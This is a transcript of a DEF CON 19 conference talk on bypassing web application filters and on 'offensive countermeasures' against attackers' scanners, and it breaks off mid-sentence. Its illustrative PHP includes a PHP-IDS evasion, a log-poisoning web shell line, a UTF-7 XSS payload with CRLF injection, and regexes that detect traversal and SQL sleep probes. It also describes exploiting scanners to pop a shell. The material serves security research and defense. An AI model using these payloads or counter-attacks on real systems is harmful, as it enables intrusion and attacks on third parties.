Traps of Gold
Formal Metadata
Title: Traps of Gold
Title of Series: DEF CON 19
Number of Parts: 122
Author: Andrew Wilson, Michael Brooks
License: CC Attribution 3.0 Unported: You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.
Identifiers: 10.5446/40537 (DOI)
Language: English
Transcript: English (auto-generated)
00:00
Okay, so hi, thank you for coming to our talk. This talk's entitled Traps of Gold. My name is Andrew Wilson. I work for Trustwave SpiderLabs. I compete in capture the flags with these guys, I've trained in martial arts for quite some time with these guys, and this is the family that supports me and makes sure that I can be here and give talks like this with you guys.
00:20
So this talk is kind of, in popular parlance, what some people would call offensive countermeasures, right? Offensive countermeasures, as defined by the PaulDotCom guys, include things like annoyance, attribution, and then attack, right? So based on where you live inside of this threshold, it's probably to your best benefit to talk to somebody who is a legal advisor
00:42
about whether or not some of the things that we're gonna show you guys today are viable inside of the environment that you work in. Some of it's gonna be straightforward stuff that you probably don't need to get permission for, and then for other things you definitely wanna seek legal counsel. This is just some proof-of-concept stuff to go from there.
01:01
My name is Michael Brooks, and I attack software. These are all the CVE numbers I've accumulated over the years. That CVE right there, CVE-0049, is where I just obtained my highest severity metric. So the Department of Homeland Security issues severity metrics
01:20
for the most serious vulnerabilities. This one right here received a severity metric of 25.2, which is in the top 500 of all time. I got it as part of the Mozilla bug bounty program, and I got their highest bounty of $3,000, and this sweet T-shirt.
01:40
But that's not what I'm here to talk about today. The reason why I'm here today is because we have a problem. Our approach to security is flawed, and one of the problems that I found is in a product called PHP-IDS. This is the wrong fucking slide.
02:03
Oh, fuck, sorry. Okay, PHP-IDS is making an incorrect assumption. What's nice about this intrusion detection system is that it's embedded into your application, so you can apply it in places that you normally couldn't,
02:23
such as a GoDaddy shared hosting account. It's making an incorrect assumption in its security system, and that is that attacks can never be repetitive. This is the vulnerable piece of code.
02:44
Now, so we rely on web application firewalls. I mean, if you think of a secure website, one of the first things you say is, well, you have a WAF, right? But the problem is that WAFs can be bypassed, and a common problem with WAFs is the preprocessor. And what you're looking at right now is a method that's being called on all input.
03:02
And what it's doing is applying a regular expression that says, hey, I wanna match a wildcard, the dot, at least two of those, and then I wanna match that same thing repeated at least 32 more times, so 33 repetitions in total. And if it finds a string that's repeated 33 times,
03:21
it replaces it with the letter X. So the significance of this is that I can hide any payload from the PHP-IDS rule sets by repeating it 33 times. The effect is that I completely bypass PHP-IDS entirely. Absolutely every rule set is bypassed.
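As a minimal sketch of the kind of repetition-collapsing preprocessor being described, assume a converter like the one below. It's an illustrative stand-in, not the exact PHP-IDS code; the function name and replacement character are assumptions, but it shows why repeating a payload 33 times hides it from every rule that runs afterwards.

```php
<?php
// Sketch of a repetition-collapsing converter: any run of 2+ characters that
// repeats 33 or more times in a row is collapsed to a single character
// BEFORE the detection rules ever see the input.
function collapse_repetitions(string $input): string
{
    // (.{2,}) captures a run of at least two characters,
    // \1{32,} requires 32 or more additional copies of that same run.
    return preg_replace('/(.{2,})\1{32,}/', 'x', $input);
}

// A payload the rule sets would normally flag...
$payload = "<script>alert(1)</script>";

// ...repeated 33 times is collapsed away and sails past every rule.
$evasion = str_repeat($payload, 33);

var_dump(collapse_repetitions($payload));  // still contains the payload
var_dump(collapse_repetitions($evasion));  // string(1) "x" -- nothing left to match
```

Because the collapse happens before any rule set is evaluated, the rules only ever see the single replacement character.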
03:40
But then I went a step further. Not only was I able to bypass it, I can intentionally trigger a rule set in order to populate its flat file logging system with PHP code. The significance of this is that once I have PHP code on the local file system, then I can turn any local file include vulnerability in the application into remote code execution.
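A hedged sketch of why that matters, with made-up file names on both sides: once the IDS's flat-file log contains attacker-supplied PHP, an ordinary local file include bug in the application turns into remote code execution.

```php
<?php
// Deliberately broken illustration of the attack chain being described;
// neither file name comes from the talk.

// 1) The IDS dutifully logs the "attack" it detected -- including a payload
//    that was crafted to contain PHP code.
file_put_contents('/tmp/ids_attack.log',
    "blocked request: <?php system(\$_GET['cmd']); ?>\n", FILE_APPEND);

// 2) Elsewhere, the application has a classic local file include flaw:
//    include() on attacker-influenced input.
$page = $_GET['page'];   // e.g. ?page=../../tmp/ids_attack.log&cmd=id
include $page;           // the logged PHP code now executes
```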
04:02
So I said a lot. But the point is that not only did I bypass the web application firewall entirely, I also made it less secure. So this is a great quote from Bruce Schneier: complexity is the worst enemy of security. So if you're able to add complexity to a system and actually make it more secure,
04:22
well, that's quite a hack. That is not easy. And here, let me demo it for you.
04:48
That wasn't the only thing I was looking at. Today we're seeing a new trend, and that is we're starting to see XSS filters in web browsers. Internet Explorer was the first to introduce this, but other browsers are following suit.
05:01
In Firefox, there's the NoScript plugin, which has an anti-XSS filter. And Chrome is also beta testing its own XSS filter. It's safe to say that soon all major web browsers will have XSS filters. So the era of very simple XSS exploitation is starting to go away.
05:20
But really, these general purpose security systems, and it's not just web application firewalls or XSS filters in browsers, but also ASLR, they create this kind of water balloon effect. The more they try and clamp down on the application, the vulnerabilities that are present
05:42
start bulging out in new and interesting ways. And... Internet Explorer's loading. Takes a while. We were thinking about putting some hold music in here for you guys, but it didn't turn out that way. Anyway, it turns out that,
06:01
so a bit of background. On the CD, I go into great detail about bypassing PHP-IDS in one of my papers. I highly recommend reading it. I go over a lot of my attack methodology. But after I submitted the paper to PHP-IDS, the developers were ecstatic. They were really happy about it.
06:21
And I'm actually now a member of their development team. I submitted a similar paper to Microsoft, about Internet Explorer, right?
06:41
And basically it's this: I found a problem with the way that Internet Explorer was handling UTF-7 characters. It turns out the way this XSS filter works is that it's looking at outgoing requests.
07:01
And it's looking specifically for angle brackets, the greater-than and less-than symbols, and quote marks. If you can create a payload that doesn't contain any of these characters, then it's possible to execute code, execute JavaScript rather. So I found a way. It turns out you can use UTF-7 encoding.
07:20
Now, UTF-7 has a history where it's only for SMTP. It's not designed for HTTP at all. In fact, no browser except Internet Explorer supports UTF-7 for web pages. But that's beside the point. The real problem here is that their XSS filter is not accounting for this.
07:41
But okay, hold on. I said that UTF-7 is not for HTTP, right? So then that means no website's going to be serving it. Except there's a way: you can change the content type of a page using a CRLF injection,
08:01
or HTTP response splitting. And bam. And it allows you to get an alert box. Here, hold on.
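For illustration, the two ingredients look roughly like this. The parameter name is invented, and current PHP versions refuse CR/LF in header(), so treat this as the shape of the bug class rather than a drop-in reproduction.

```php
<?php
// Rough, purely illustrative sketch of the UTF-7 plus response-splitting combo.

// 1) A <script> payload expressed in UTF-7 contains none of the characters
//    the filter is watching for -- no angle brackets, no quotes.
$utf7Payload = '+ADw-script+AD4-alert(1)+ADw-/script+AD4-';

// 2) A header built from unsanitized input is where CRLF injection lives:
//    something like  ?lang=en%0d%0aContent-Type:text/html;charset=UTF-7
//    smuggles in a second header and flips the page's charset.
$lang = $_GET['lang'] ?? 'en';
header('Content-Language: ' . $lang);   // the vulnerable pattern: no filtering

// The reflected "harmless" text now gets decoded as UTF-7 markup by a
// browser that honors that charset (historically, Internet Explorer).
echo $utf7Payload;
```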
08:30
The, sorry, technical difficulties. Yeah, memory. All right, I apologize. I was gonna show you a great masterpiece.
08:42
And that is that I was going to bypass both PHP-IDS's built-in rule set for XSS and Internet Explorer's XSS filter in the exact same attack. It is possible to bypass both filters, on the browser and the server, and be able to execute code, ultimately.
09:03
So it doesn't matter. It doesn't matter that we're adding all of these new filters if the fundamental problem remains: they can be bypassed, they can be fooled. So we need another approach. Screw slides, we can do it from memory. Okay, so why talk about all this, right? What's the point of explaining,
09:21
you know, a bypass to PHP-IDS, a bypass to Internet Explorer? It's that these are supposed to be the defensive products that we're gonna be relying on for the security of applications. And kind of as Michael was pointing out, this is stuff that we're gonna be relying on more and more as we get into the future, right? So you kind of saw a slide there for just two seconds before we crashed, about frustration, right?
09:42
Does anybody here in the room earnestly think the security development approach is working? We see the news every day: some major company, some data breach, not just a small one but a really large one, comes into play and it hits people in pretty negative, impactful ways, right? So everybody's kind of getting hit with that.
10:01
And we feel that the ultimate reason for that is kind of our approach to dealing with security has been a quality issue, right? It's a bug. When you look at books that are in popular use today, stuff like the secure development life cycle for Microsoft and then secure code and some of the rugged movement stuff, we treat security issues literally as if they were a quality concern
10:21
and that's how we approach it, right? We took strategies to mitigate security issues like it was a bug, like it was a quality concern and that starts with patch management, right? So patch management takes an approach that says, you find a bug, it's in production, we've gotta fix it, so you write new code that fixes the abuse scenario
10:40
so that way you can actually go ahead and make it safe. But that tends to come with some baggage, right? The first problem is that if you have a bug inside of a production system, it's available for people to exploit it and if it's a known exploit, you run this patch window life cycle, right? Where Microsoft puts out a patch on patch Tuesday,
11:01
it's reverse engineered on Wednesday and then you have a time between that patch, that release, where anybody who hasn't updated on the availability of the release is still incredibly vulnerable, right? So there's definitely some issues with that approach and then you run into a secondary issue where the patch itself may not necessarily be something that actually fixes the issue.
11:21
It might be a temporary fix or it might be... There's also another problem. Really, the problems with IE's XSS filter are trivial to fix, it would take an afternoon. But they didn't even recognize it was a vulnerability. They won't even fix it, it's a constant problem. Back in 2004, there was an interesting vulnerability
11:41
that was released in IE, it was called the IE Drag and Drop Vulnerability, all right? It allowed, in the attack, the victim picks up a carrot and drags it, just as if it was a game. The only problem is that that's not a carrot, it's actually an executable on a remote share
12:00
and you're dragging it into your startup folder. You could get remote shell on Internet Explorer for two years, and Microsoft said, that's not a vulnerability? Like, you've gotta be kidding me. Ultimately, they did patch it, and it wasn't until four years after this attack that the term clickjacking was even coined. But recognizing that there's a problem
12:23
is an important step. Yeah, so patch management obviously was not ideal and everybody kind of knows that, right? Anybody who's done secure, regular development doesn't want bugs in production, right? Because bugs in production is no bueno. The problem with that is that we move forward.
12:43
We move forward to, here, let's just play it from here. So patch management, doo, doo, doo, doo, doo. Oh, and the computer crashed again. So I guess we're gonna do this whole thing from memory, that's fine.
13:01
No big deal. It is a Mac. Apparently it has not been watching enough TV. That's my theory. Okay, so screw my laptop. So SDLC, right? SDLC came out as a measure to say, hey, bugs in production, that's definitely not the way that you wanna go about doing this, right? Because inside of that system, was that?
13:20
Just try booting up again. Yeah, I'll try booting up again. Inside of that system, you wanna deal with it proactively, right? So you build it into your development life cycle. It becomes something that you have to deal with. It becomes an earlier system. You start defining it. You come up with quality gates. You do threat models. You work inside of the system and make sure that it works for what you're doing as your dev cycle.
13:40
And then at the end of the day, it's sort of a process of refinement, right? You try to reduce known vulnerabilities inside of the application. I'm a huge fan of Microsoft's SDLC, right? Despite the fact that it misses stuff, I think that it's the way that people ought to be taking a look at writing software, right? It's super mature, 10 years something of experience, lots of money, lots of manpower,
14:01
and perhaps even more importantly, it has executive buy-in to say you can't release insecure software, right? So it's a great approach, fantastic approach, right? But you still have Patch Tuesday, right? You still have bugs that do get out into the system. And so we gotta kinda question what advantage does this have? And how tenable is this as an end product for us, right?
14:23
So the final thing we throw out there as our solution to security is more bad software, right? I call it defects in defense, right? If we put more software like web application firewalls or we put protections like antivirus or regular firewalls in front of these things, they're gonna stop bad guys from doing bad things.
14:43
But kind of as we just showed earlier within the context of our actual attack component, you can bypass those things. And so when we rely on stuff like that, that definitely creates a situation for us that's pretty disadvantageous, right? It's not ideal. That's how we end up with the TSA, right?
15:02
You get groped for free in the airport, which is nice, right, admittedly, but does it make you any safer is kind of the question. And what about the backscatter security scanners, right? Like we spend tens of millions of dollars on a security system that can be defeated with pancakes. Like really, really, are we really doing this?
15:20
And this is at least the second time that breakfast has been used in an attack. The first, of course, being the Captain Crunch whistle. So clearly more research needs to be done in the area of breakfast-based exploitation. I'm just putting that out there. All right. So the question then really, this talk is not about all the stuff that's broken, right?
15:40
I wanna point out that these are difficulties that we face. It's the reality of writing software, and it's stuff that we need to continue to do. I think that's just security hygiene, right? It's the sort of stuff you do. You brush your teeth because you don't want bad breath, and ideally it makes you a better person. Even refinement, right, is good too, but none of these approaches actually stop you from getting punched in the face, nor do they really prepare you for that, right?
16:02
Like having clean teeth isn't a defensive countermeasure, in my opinion. And so we really think that the solution, or the answer here, is we need to start looking at strategies in which we can fight back against people, right? We wanna kick their ass, right? When I was working at a company a while ago, I used to tell developers they've gotta build their applications so they can take a punch.
16:21
I'm gonna change my statement. I think you need to build applications that punch people back, right? I think that needs to be the way we move down this road. So how do we do that, right? How do we build in systems for that? And that's, we leverage technology that already exists, PHP-IDS being one of those. We use Honeypot and Honeynet technologies,
16:41
and then we write exploits that are capable of taking advantage of the fact that the software that's going to be attempting to hit you is also vulnerable to all the same things that we talked about before, right? They have bugs, they have weaknesses, they have problems. There's this phenomenal Twitter feed from Richard Bejtlich, who said something great.
17:01
He said, it's not just because we have these glass built homes, it's because there's people throwing bricks at them, right? And that's what we need to deal with, is the brick throwers. Hacking against our systems and attacking these things, this is a human problem that manifests itself with technology.
17:28
Check this out. Hey, this is good, it works nice on mine.
18:00
Well, that was a nice idea, unless you can fix the mirroring for me too. We'll just move on. So they have the risk too, right? This is a human problem, and because it's a human problem, I think that's exactly where we attack people, right? We chase them in the places where they're human. Bad guys who are doing bad things against you,
18:21
they have things like ego and bias, and they think they're gonna get in, and when they find results, they're gonna try to exploit these results because they're basing it off of prior experience and prior knowledge. They have weaknesses in the sense that the tools that they're using are imperfect as well. And we'll just go from here.
18:41
And so we need to start focusing on strategies that take advantage of that, right? How do I move it down? All right, sweet, so we're about here. That's where we attack them. When we look at how we're gonna do that, we're gonna leverage stuff that other people have done, and that includes IDS systems, honeypots, exploits, and we're gonna put those together in a fashion
19:01
that we can trap people inside of our systems to create things like better attribution, shut down their tools so they ignore particular content areas, or in certain cases, just completely shut them down entirely. So the thing about lying, we're worried about China hacking into us, right? Well, we're worried about them
19:20
getting a leg up in business, but that's weak. China is being weak. If they have to rely on breaking into you to get a leg up, what happens if, when they hack into you, you give them information that you want them to find? What if you use that against them, and they steal a secret that you want them to have?
19:41
Something to think about. Right. If they can social engineer us, why can't we social engineer them, right? So people will say, well, potentially security hygiene is a way that you are fighting back, right? They might say that. And I would kinda classify that as more of a war of attrition, right? When you look at how people fight combat,
20:00
how they can compete in combat, there's really two strategies. There's an attrition-based model and then a maneuverability model, which is kind of a modern-day guerrilla warfare combined with some other things, right? And in a war through attrition, the idea is that I'm gonna gather as many resources as I possibly can and kinda who has the most arms wins, right? If they have four nuclear warheads,
20:21
I've gotta get 10, right? And then when they get 10, I've gotta come up with a better nuclear warhead, so then I'm kinda the winner, right? That approach is expensive because it costs to build it up. It's expensive because it costs to maintain these things. And then it's expensive in the sense that if you actually go toe-to-toe with these people, it's pretty deadly when you actually start talking about it
20:40
in real tangible terms of human life, right? But that's not actually how the bad guys are attacking us. They're taking an approach, whether conscious or unconscious, of maneuverability, right? It's like our good guys, our defensive line, wants to create a football team, right? So we get the very best football players we can find. We give them the best food. We work out with them in the best equipment.
21:02
We do the best training. And so they're the biggest and the baddest, right? And they're gonna shut down the offensive line. And when they show up to play the game, they're there to win, right? But in this case, the offensive line has, like, poisoned their food, they're sleeping with their girlfriends on the side, right? By the time they go to play the game, they've already broken into their house and stolen all their money. That's how the bad guys are attacking.
21:20
They've set the stage up so that all the things you think you're doing that are to your advantage end up being to your weakness, right? They're not gonna play your game because your game is designed so you can win, right? So they play their game and they make you play their game as a means to shut you down, right? And so if we look at strategies, I think the people that we wanna look to is people who are actually fighting
21:41
in a capacity to do that. And in this case, we've kind of based a model off of the United States Marine Corps. So maneuverability, just as a bit of historical reference, comes from a gentleman primarily known as John Boyd. I don't know if you're familiar with the OODA loop, but he's the guy behind that, and he's definitely behind maneuverability, right?
22:00
Maneuverability as a core doctrine says we aim to shatter the cohesion of our opponents so they can't make decisions in a timely manner, while we gain strategic advantage and basically obliterate them, right? We're gonna use their stuff against them, we're gonna stack the deck in our own favor. This strategy is based off of three major components,
22:20
right? The first being ambiguity, the second being deception, and the third ultimately being tempo, right? Ambiguity is this idea that if there's more than one way to accomplish a task, we should try to find a route that makes it very un-obvious what we're actually doing, right? If we go ahead and say I have a destination and there's four different ways that I might possibly get there,
22:41
from a pure resourcing perspective, if you're trying to provide intel about how somebody does something, you need four times the resources in order to monitor each one of the possible ones, because presumably you don't know where they're going, right? That's the value of ambiguity. But that's not how we build apps. We build our applications like they're billboards, right? We're proud of the fact that we wrote it in Java,
23:01
or we're proud of the CMS that we built it on, or we're proud of all the developers who were involved, that's why we leave dev comments all over the place, right? And we make it as if, hey, not only am I going to this destination, but here's how I'm gonna get there, here's who I'm taking along with me, and here's all the gear that I'm gonna be packing with it, right? And so some of the ways we see that
23:21
are server banners, where we tell people what we're running. Oftentimes you don't need those, right? They're not of any value, and when you start measuring that against things like the Shodan project, or people doing Google dorks when they find an exploit in a CMS or something that you might be using, those are pretty compelling reasons that you might not want to sit around and tell people that stuff, right? File extensions:
23:41
your browser doesn't care about file extensions. If you send them HTML back, for the most part your browser is fine. So unless you have a use case where you have different mappings for how the file extension comes back, that's mostly a server side processing issue, and in most cases you can completely disable that and not say, hey, I've got PHP, or hey, I'm running ASP.net, or hey, I'm running Ruby, right?
24:01
Those are things that are unnecessary. And then finally, default files, right? I was working on a CMS a couple weeks ago, and they had some default control examples for developers, and it says, hey, this is how you write software using our stuff, it's installed by default, and it's of advantage, right? But the problem is that these control examples
24:20
were bound to the top node of the CMS, so they could look at every single part of the application with unauthenticated access. So from a default control example that was left enabled, you could completely bypass the majority of the security in the entire CMS, off of a default file, right? So these are most often unnecessary, and in fact, these are some of the things that, when you start looking at tools like JoomScan
24:42
or CMS Explorer, or any of the tools that are based around fingerprinting, they're gonna be using these as a means to identify how you've built your application, what plugins you've got enabled, and how they might actually go about attacking them. So if knowing's half the battle, you should shut up, right?
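At the application layer, the "shut up" step can be as plain as the sketch below, assuming a simple front-controller style PHP app. The routes are invented, and banner hiding on the web server itself (for example Apache's ServerTokens directive) is a config change rather than code.

```php
<?php
// Minimal sketch: stop volunteering the platform.

// Drop PHP's X-Powered-By header (expose_php = Off in php.ini does the
// same thing globally).
header_remove('X-Powered-By');

// Serve everything through extensionless routes, so the URL itself stops
// advertising .php, .aspx, or whatever the stack happens to be.
$routes = [
    '/'       => 'pages/home.php',
    '/report' => 'pages/report.php',
    '/login'  => 'pages/login.php',
];

$path = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);

if (isset($routes[$path])) {
    require $routes[$path];
} else {
    http_response_code(404);
}
```

The point isn't that any one header matters much on its own; it's that every signal you stop volunteering is one more thing a fingerprinting tool has to guess at.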
25:01
That's what this is about: just don't be so obvious about everything you're doing. And that's kind of the first step, right? So the next step is deception, and this is where we kinda get into the fun stuff. Deception's about lying, right? We're gonna convince people that we're doing stuff that we're not in fact planning on doing at all, right? Instead of saying, hey, I'm going to this destination, and everybody plans and gets themselves situated to do that,
25:20
don't go to that destination, right? Set them up to do it, it's a trap, or maybe you set up ways that if you go to that destination, you're gonna get ambushed as you get there. And there's a couple of ways that we might go about doing that. Reduce the things that they can know, we lie about everything else, and we could do that by increasing the noise, we can blatantly lie about stuff. And if I had a computer to show you,
25:41
I've been able to trigger every single vulnerability that's identified through major security tools, like Nikto, for instance. I can trigger 54,000, or 5,400, vulnerabilities inside of it. If you scan my site, I could tell you every single thing is valid, right? So how do you figure out which one of those is valid, if you're trying to scan my system
26:01
and try to identify components in it? In PHP-IDS, I added a system of triggers. So when a particular rule set is hit, let's say it's a blind SQL injection test and they're trying to get us to sleep for 30 seconds. Well, when I see an incoming request and PHP-IDS flags it, then I look at it:
26:21
I'm like, well, how long do they want me to sleep for? I pull it out with a regular expression and sleep for that period of time. This fools every scanner. Another thing: what happens if they're trying to use directory traversal, and they're trying to grab, like, /etc/passwd? Well, we'll just print out that file, that's fine. It's a fake, it's not the actual file. The same thing goes for Windows files,
26:41
like trying to get win.ini. And the point is that it's easy to fool. These tools are trusting. They're not planning on someone lying to them, and so they're easy to manipulate.
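A simplified stand-in for the trigger idea, with invented patterns and fake file contents: once the IDS has flagged a request, play along with whatever the scanner is expecting to see.

```php
<?php
// Sketch only -- not the speaker's actual PHP-IDS extension.
function handle_flagged_request(string $input): void
{
    // Blind SQL injection probes: pull the requested delay out of the
    // payload and actually sleep that long, so time-based checks "confirm"
    // a vulnerability that isn't there.
    if (preg_match('/sleep\s*\(\s*(\d+)\s*\)/i', $input, $m)) {
        sleep((int) $m[1]);
        return;
    }

    // Directory traversal probes: hand back a plausible-looking fake file.
    if (preg_match('#\.\./.*etc/passwd#', $input)) {
        echo "root:x:0:0:root:/root:/bin/bash\n";
        echo "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n";
        exit;
    }
    if (stripos($input, 'win.ini') !== false) {
        echo "; for 16-bit app support\n[fonts]\n[extensions]\n";
        exit;
    }
}
```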
27:00
So I actually have a slide, in the deck that doesn't crash, that says this isn't to pick on Nikto, right? Nikto is just an example of a tool that we use to do this, but we've been able to actually trigger false positives on just about every major scanner, commercial or non-commercial, in the industry today. We can lie to them, we can subvert their ability to make cognizant decisions, because ultimately, when it boils down to it, they have this pseudo-responsibility of being safe, right? They don't want to shut you down, which means they're not gonna exploit stuff
27:21
that they find. And if they don't exploit stuff, they're just collecting evidence and saying, hey, it kind of sort of looks like this. So you might as well lie about the evidence and make sure that it happens. A secondary issue, kind of a corollary to this, is how these things work; oftentimes they make developer mistakes. If you're putting together a scanner or a tool and a page returns a 404,
27:41
oftentimes developers use that as a null check, right? I hit a webpage, and if I get a 404, it means there's no content, so why bother scanning it, right? Well, the problem is that your browser actually doesn't care what status code comes back. It'll render that content anyways. And so one of the ways you can actually evade content being discovered is if you take and return 404s for all your 200s:
28:01
it makes most scanners disappear by default, and they can't identify stuff inside of it. It's actually really trippy: if you're using a popular scanning tool, one that everybody uses in the industry for regular work, and you try to spider off the index, it actually makes the entire webpage disappear, because as it's finding stuff it says 404, 404, 404,
28:21
and so you can't rely on it for results. Pages don't get included when you try to do other, more advanced analysis, because as far as the tool is concerned, the content doesn't exist at all, right? So that's not necessarily gonna fool people. That's just a design strategy to say, hey, these tools are running automation against us, which in and of itself is pretty bad.
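A minimal sketch of the 404-for-200 trick, assuming a small routing table; the paths are invented. The real body is still served, so a person in a browser sees the page, but the status line claims the page doesn't exist, and spiders that treat 404 as "nothing here" quietly drop it from their results.

```php
<?php
// Illustrative front controller: lie in the status line, tell the truth in the body.
$pages = [
    '/'        => 'pages/index.html',
    '/reports' => 'pages/reports.html',
];

$path = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);

if (isset($pages[$path])) {
    http_response_code(404);      // lie in the status line...
    readfile($pages[$path]);      // ...but render the real content anyway
} else {
    http_response_code(404);      // genuinely missing pages look identical
}
```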
28:42
Because if you think of the Imperva study that just came out, where you're getting scanned once every two minutes, maybe shutting down the scanner's ability to do that would probably be to your advantage. So, people, right? This is a people problem, and kind of as Mike was pointing out, some of the lies are a lot better than others. When you get into forensics and you're trying to understand what happens inside of an application,
29:00
the only way that you're gonna be able to really understand it is to start exploiting it and get information back out. And if you can create a scenario where, like he was talking about, you're getting back the files you're looking for, you're getting back the blind SQL injection that you're expecting, everything is working along the testing route that you've already prepared yourself for, why would you believe that's not valid? Why would you give it up and say,
29:21
hey, maybe something's wrong? Personally, I think I'd probably spend a really long time trying to figure out what I'm doing wrong, as opposed to thinking, hey, maybe they're lying to me, right? But then you can take it a step further. Why can't I seed my application with tripwires? Why can't I create form fields inside of my app that do absolutely nothing, other than, if you tamper with this,
29:42
I know you're tampering with stuff, right? Then you put that inside of a secondary database that's isolated just like you would a honeypot and you can actually let them exploit it. You can let them run the full broad spectrum completely isolated away from your production environment but while you're doing this, you're building attribution. You're building a case against them. You know at this point it's probably not a scanner anymore
30:02
and it's probably somebody exploiting your system, and you actually have a case. If you wanna build this attribution for prosecution later, you've created better information, better intel, about what they're doing against you, right?
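A rough sketch of such a tripwire field, with invented field, table, and path names: the rendered form hides it, a real user never touches it, and anything that does touch it gets logged to an isolated store, honeypot-style, instead of the production database.

```php
<?php
// Illustrative only: a bait parameter plus isolated logging.
?>
<form method="post" action="/profile">
  <input type="text" name="display_name">
  <!-- bait: hidden via CSS, irresistible to anyone fuzzing parameters -->
  <input type="text" name="account_role" value="user" style="display:none">
</form>
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST'
        && ($_POST['account_role'] ?? 'user') !== 'user') {
    // Record the hit in a separate store, away from production data,
    // so attribution can be built without any risk to the real system.
    $trap = new PDO('sqlite:/var/honeydata/tripwire.sqlite');
    $stmt = $trap->prepare(
        'INSERT INTO hits (ip, payload, seen_at) VALUES (?, ?, ?)'
    );
    $stmt->execute([
        $_SERVER['REMOTE_ADDR'],
        (string) $_POST['account_role'],
        date('c'),
    ]);
}
```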
30:21
And that leads into tempo. Tempo is about initiative. A lot of people think of pace or tempo, they think speed, and maneuverability does have some concepts based in speed. If I can overwhelm you by creating and putting forth a greater effort before you can start actively making real decisions about it, I'm pretty likely to win. If anybody competes in games like chess, go, anything like that, boxing: you never win if you play their game, right? You can't win if you play their game.
30:40
You have to take initiative and you have to keep it the entire way through, which means you can't be relying on reaction. You have to be relying on awareness and then proper decision making. There was a study that came out a couple of years ago where they had junior tennis players and advanced tennis players, and they were measuring reaction speeds to see who was faster, you know, to kinda draw some comparisons between them,
31:00
and they found that the difference was actually fairly nominal in the context of overall reaction. But where the juniors were failing and where the expert players were excelling is that the junior player would wait until the ball was hit before they start making decisions about where to go. Whereas the senior players were doing things like watching where the shoulder was moving or how the hips were turning
31:21
and how the arm was coming up, and they were getting intel quicker into that process so they could make better decisions, and they weren't relying on reaction. They weren't relying on trying to catch up. They were changing the pace to their own advantage and using that as a way to make decisions against people, and that's something that we need to do too. And if we build a system like we're talking about, where it has IDS systems inside of it
31:43
that are creating a bunch of false positives, effectively embedded honeynets, you can create a perceived attack surface that's completely different than the actual surface of attack inside of your system, right? So as people are going down this route, you've already gotten visibility into the fact that they're doing bad things against you. If you feed this into a SIEM, or ideally a project
32:02
that lets you create better decisions against it, you can then use these things to create a scenario where you can decide how you want to respond, right? You can kick them out of your system, you can shut them down, or you can potentially attack them, as we'll get to, right? So, yeah, that's where I think the AppSensor project comes in.
32:22
The OWASP AppSensor project, the stuff that Michael Coates is working on, actually has a lot of value, because the application has to be embedded in a context of awareness as to what's going on inside of it, which is why we chose PHP-IDS as our base model for this: because it lives inside of the application. One thing you can do when you're living inside an application
32:41
is you can see how it's reacting. So one thing is to shut down blind SQL injection tests, we can sleep. But what about error-based detection, okay? So we could give them fake error messages, but what if they trigger a real error? Like what happens if they trigger a MySQL error in our application or even worse, like an eval error? Like they're trying to evaluate PHP code. Well, when we get to that level, we can shut down.
33:03
We know that they've broken something critical in the application, and we can kill the application, right? A kill bit: if that kill bit exists, then do not run. And the point is that, yeah, okay, this is now a denial-of-service attack, right? But it's a hell of a lot better than remote code execution. You can go back and fix that. So we're not playing the game.
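A minimal sketch of that kill bit, with an assumed file path and error checks: trip it from the error-handling path on anything that should never happen in legitimate use, and refuse to serve requests until a human has looked.

```php
<?php
// Illustrative kill-bit wiring, not a drop-in framework integration.
const KILL_BIT = '/var/run/app.killbit';

// Every request starts here: if the kill bit exists, do not run.
if (file_exists(KILL_BIT)) {
    http_response_code(503);
    exit('Temporarily unavailable.');
}

function trip_kill_bit(string $why): void
{
    file_put_contents(KILL_BIT, date('c') . ' ' . $why . "\n");
    http_response_code(503);
    exit;
}

// Somewhere in the database layer:
try {
    // ... normal queries ...
} catch (PDOException $e) {
    // A genuine SQL error mid-request means something critical broke.
    trip_kill_bit('unexpected SQL error: ' . $e->getMessage());
}
```

Accepting the self-inflicted denial of service is the design choice being argued for here: it's recoverable, and remote code execution often isn't.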
33:22
We know that you've gotten too far and we can shut down. So how do we put this all together, right? That's the real question and we love it when a plan comes together, of course. And so we talked about misdirection with the 404s. We've talked about shutting down tools, scanners, completely invalidating the results. And in some cases, as we were hitting scanners,
33:41
we can just crash the scanner remotely by accident, right? At least one or two major scanners that we've hit this with, we've actually been able to stop the scanner from working completely inside of that so we can increase awareness as to what was going on. But the real question is can we attack people with the scanner or through the scanner?
34:00
And I think yes, we can. All right, what you're looking at is a very unpatched Windows XP VM running Acunetix. Right now we'll... anyway. So I wanna be careful here, and I definitely don't want
34:20
this to end up on the news reading "0-day in Acunetix." Actually, this attack is not based on Acunetix. This is an attack based on the fact that Acunetix, like many other web scanners on the market, when it's trying to parse information, wants to do that well. The only real way to do that is to use an embedded browser, or to use the browser that's on the system, because you need to execute the JavaScript, you need to execute the HTML, in order
34:41
to get a real clear picture. For instance, little things like if they have Ajax requests on the page and content comes back dynamically. If all you're doing is an HTTP GET and then parsing the results back out, because there's no dynamic execution environment, you'll never see any of that content, right? So commercial grade scanners or particularly advanced scanners, good scanners, quite frankly,
35:01
they're gonna be using this as a mechanism to gather intel about what's going on. So let's pop this. So you should attack them exactly in that spot. Ah. That kind of pop, all right.
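As a sketch of content that only exists once JavaScript runs, consider a page like the one below; the paths are invented. A dumb GET-and-parse spider never learns about the linked URL, but a scanner driving an embedded browser executes the script and requests it, which is exactly the spot being described.

```php
<?php
// Illustrative only: the interesting link is created client-side.
?>
<html>
  <body>
    <div id="app">Loading...</div>
    <script>
      // Content injected dynamically, so it only exists for JS-executing clients.
      document.getElementById('app').innerHTML =
          '<a href="/only-for-js-clients/">quarterly reports</a>';
      // An Ajax beacon that proves the client executed JavaScript at all.
      fetch('/only-for-js-clients/ping');
    </script>
  </body>
</html>
```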
35:21
Okay, so actually what I was doing was scanning Metasploit. And hopefully, and now there's a shell. You notice it popped it in web vulnerability scanner seven so it popped just fine.
35:40
Now, really, so what's happening here? Like we heard about the Zeus botnet being leaked and the source code for that. So these black hats have these great tools to attack the web browser. Well, what about using these tools to defend ourselves? What about having Zeus installed on your production server with a disallow saying, hey, disallow,
36:01
